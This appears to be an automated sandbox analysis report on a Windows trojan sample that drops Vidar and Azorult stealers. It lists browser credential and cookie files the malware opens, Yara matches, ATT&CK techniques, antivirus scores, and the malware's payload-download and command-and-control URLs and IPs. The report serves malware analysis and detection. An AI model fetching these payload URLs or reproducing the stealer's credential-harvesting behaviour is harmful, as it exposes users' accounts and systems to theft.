Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\yiaxs5ej.default\times.json	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\containers.json	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\handlers.json	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\parent.lock	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore.jsonlz4	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\pkcs11.txt	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Google Profile.ico	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\addons.json	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\shield-preference-experiments.json	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\SiteSecurityServiceState.txt	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\targeting.snapshot.json	Jump to behavior

Source: Yara match

File source: Process Memory Space: build2.exe PID: 5748, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar stealer

Source: Yara match	File source: 8.2.build2.exe.35815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.build2.exe.35815a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2286401544.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2111977790.0000000003580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 4292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build2.exe PID: 5748, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	1 Taint Shared Content	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	2 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	1 Scheduled Task/Job	1 DLL Side-Loading	2 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	1 Registry Run Keys / Startup Folder	311 Process Injection	2 Software Packing	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 Command and Scripting Interpreter	1 Services File Permissions Weakness	1 Scheduled Task/Job	1 DLL Side-Loading	NTDS	44 System Information Discovery	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	1 Registry Run Keys / Startup Folder	1 Masquerading	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Services File Permissions Weakness	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	271 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Services File Permissions Weakness	Proc Filesystem	2 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
sIQywRNC5M.exe	42%	Virustotal		Browse
sIQywRNC5M.exe	42%	ReversingLabs	Win32.Trojan.Generic
sIQywRNC5M.exe	100%	Avira	HEUR/AGEN.1313019
sIQywRNC5M.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	100%	Avira	HEUR/AGEN.1313019
C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	42%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	42%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqln[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqln[1].dll	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\build2[1].exe	74%	ReversingLabs	Win32.Spyware.Vidar
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\build2[1].exe	79%	Virustotal		Browse
C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	87%	ReversingLabs	Win32.Trojan.Azorult
C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	87%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
sdfjhuz.com	24%	Virustotal		Browse
cajgtus.com	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://autodiscover.uk/Autodiscover/Autodiscover.xml	0%	URL Reputation	safe
https://autodiscover.uk/Autodiscover/Autodiscover.xml	0%	URL Reputation	safe
https://autodiscover.in/Autodiscover/Autodiscover.xml	0%	URL Reputation	safe
https://autodiscover.com/autodiscover/autodiscover.xml	100%	URL Reputation	phishing
https://autodiscover.it/Autodiscover/Autodiscover.xml	0%	URL Reputation	safe
https://autodiscover.fr/Autodiscover/Autodiscover.xml	0%	URL Reputation	safe
https://autodiscover.xyz/Autodiscover/Autodiscover.xml	0%	URL Reputation	safe
https://autodiscover.com.br/autodiscover/autodiscover.xml	0%	URL Reputation	safe
https://autodiscover.online/autodiscover/autodiscover.xml	0%	URL Reputation	safe
https://autodiscover.com.cn/Autodiscover/Autodiscover.xml	0%	URL Reputation	safe
http://schemas.m	0%	URL Reputation	safe
http://cajgtus.com/files/1/build3.exe$run	0%	Avira URL Cloud	safe
https://95.217.9.149GCAEH	0%	Avira URL Cloud	safe
https://95.217.9.149/crosoft	0%	Avira URL Cloud	safe
http://cajgtus.com/test2/get.php?pid=903E7F261711F85395E5CEFBF4173C54	0%	Avira URL Cloud	safe
https://www.gstatic.cn/recaptcha/	0%	Avira URL Cloud	safe
http://cajgtus.com/files/1/build3.exerun2b	0%	Avira URL Cloud	safe
http://cajgtus.com/test2/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=truelUc	0%	Avira URL Cloud	safe
https://s.ytimg.com;	0%	Avira URL Cloud	safe
http://cajgtus.com/files/1/build3.exe$run	2%	Virustotal		Browse
https://www.gstatic.cn/recaptcha/	0%	Virustotal		Browse
http://cajgtus.com/test2/get.phpu	0%	Avira URL Cloud	safe
https://steam.tv/	0%	Avira URL Cloud	safe
https://95.217.9.1490.5938.132	0%	Avira URL Cloud	safe
http://cajgtus.com/files/1/build3.exe$runinstall020921_delay721_sec.exe0D	0%	Avira URL Cloud	safe
http://sdfjhuz.com/dl/build2.exe$run	100%	Avira URL Cloud	malware
https://lv.queniujq.cn	0%	Avira URL Cloud	safe
https://95.217.9.149/l%	0%	Avira URL Cloud	safe
https://95.217.9.149ta	0%	Avira URL Cloud	safe
https://95.217.9.149/	0%	Avira URL Cloud	safe
http://cajgtus.com/test2/get.php	0%	Avira URL Cloud	safe
http://sdfjhuz.com/dl/build2.exe$run	3%	Virustotal		Browse
https://95.217.9.149/so	0%	Avira URL Cloud	safe
https://lv.queniujq.cn	0%	Virustotal		Browse
https://95.217.9.149/	4%	Virustotal		Browse
https://95.217.9.149.exe	0%	Avira URL Cloud	safe
https://95.217.9.149	0%	Avira URL Cloud	safe
https://steam.tv/	0%	Virustotal		Browse
http://cajgtus.com/test2/get.php	14%	Virustotal		Browse
http://cajgtus.com/files/1/build3.exe$runinstall020921_delay721_sec.exe0D	10%	Virustotal		Browse
https://95.217.9.149	4%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sdfjhuz.com	201.103.73.225	true	true	24%, Virustotal, Browse	unknown
cajgtus.com	63.143.98.185	true	true	4%, Virustotal, Browse	unknown
steamcommunity.com	184.85.65.125	true	false		high
api.2ip.ua	104.21.65.24	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://cajgtus.com/test2/get.php?pid=903E7F261711F85395E5CEFBF4173C54	true	Avira URL Cloud: safe	unknown
https://95.217.9.149/	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://cajgtus.com/test2/get.php	true	14%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://player.vimeo.com	build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	false		high
http://cajgtus.com/files/1/build3.exe$run	sIQywRNC5M.exe, 00000005.00000002.2544952320.00000000007E7000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://autodiscover.uk/Autodiscover/Autodiscover.xml	excel.exe_Rules.xml.5.dr	false	URL Reputation: safe URL Reputation: safe	unknown
https://assets.activity.windows.com/v1/assets	sIQywRNC5M.exe, 00000005.00000003.2120539696.0000000009A60000.00000004.00001000.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199673019888	build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://95.217.9.149GCAEH	build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6jg&a	build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://artifacts.dev.azure.com/office/_apis/symbol/symsrv/privacy-sdx.win32.bundle.js.map/e3b0c4429	sIQywRNC5M.exe, 00000005.00000003.2124951153.0000000009A60000.00000004.00001000.00020000.00000000.sdmp	false		high
https://95.217.9.149/crosoft	build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/subscriber_agreement/	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.gstatic.cn/recaptcha/	build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199673019888%0	build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
http://cajgtus.com/test2/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=truelUc	sIQywRNC5M.exe, 00000005.00000002.2544952320.00000000007A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.json&	sIQywRNC5M.exe, 00000016.00000002.2555939847.00000000006C8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com	build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://autodiscover.in/Autodiscover/Autodiscover.xml	excel.exe_Rules.xml.5.dr	false	URL Reputation: safe	unknown
https://autodiscover.com/autodiscover/autodiscover.xml	excel.exe_Rules.xml.5.dr	true	URL Reputation: phishing	unknown
https://autodiscover.it/Autodiscover/Autodiscover.xml	excel.exe_Rules.xml.5.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en	build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://autodiscover.fr/Autodiscover/Autodiscover.xml	excel.exe_Rules.xml.5.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
http://cajgtus.com/files/1/build3.exerun2b	sIQywRNC5M.exe, 00000005.00000002.2544952320.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am	build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
